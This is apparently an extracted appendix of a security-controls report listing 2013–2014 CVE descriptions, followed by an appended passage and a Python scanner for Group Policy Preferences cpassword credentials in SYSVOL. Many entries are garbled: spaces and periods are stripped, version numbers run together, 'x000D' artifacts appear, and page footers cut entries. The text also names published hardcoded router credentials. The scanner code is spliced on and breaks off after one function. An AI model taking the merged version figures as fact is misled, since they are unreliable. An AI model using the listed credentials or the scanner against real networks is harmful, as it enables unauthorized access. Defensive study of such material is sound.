CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11, 4.1.x and 4.2.x before 4.2.7, and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject

CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate

CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors

CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897

CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation

CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671

CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341

CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)

CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster Page 20 of 28

CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to /filesystem.

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS-SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28

executable file for a crafted application

CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4

CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page

CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors

CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors

CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors

CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection

CVE-2014-1565
The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586
content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701
The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740
Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744
Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753
Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-1806
The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."

CVE-2014-1808
Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."

CVE-2014-1811
The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."

CVE-2014-1812
The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."
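The Group Policy Preferences entry above is one where patching alone is not enough: the MS14-025 update stops new passwords from being written, but it does not remove the ones already sitting in SYSVOL, and SYSVOL is readable by every authenticated domain user. The AES key that protects the cpassword attribute is published in Microsoft's MS-GPPREF specification, so any cpassword that is found should be treated as a cleartext credential. The scanner below is an added example written for this appendix, not code from the report or from Microsoft; the file names and attribute names are the documented GPP ones, the Groups.xml sample is constructed, and its cpassword value is a placeholder.

```python
"""Find stored credentials (cpassword) in Group Policy Preferences XML.

Added example; the sample XML is constructed and its cpassword value is a
placeholder, not a real encrypted password.
"""
import os
import xml.etree.ElementTree as ET

# GPP files that may carry a cpassword attribute. They live under
# \\<domain>\SYSVOL\<domain>\Policies\{GUID}\(Machine|User)\Preferences\...
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}

# Attributes that name the account the password belongs to, per file type.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def find_cpasswords(xml_text, source="<memory>"):
    """Return one finding per element that carries a non-empty cpassword.

    An empty cpassword means the password was cleared, so it is not reported.
    """
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        cpw = elem.get("cpassword")
        if not cpw:
            continue
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "")
        findings.append({
            "source": source,
            "element": elem.tag,
            "account": account,
            "cpassword_len": len(cpw),
        })
    return findings


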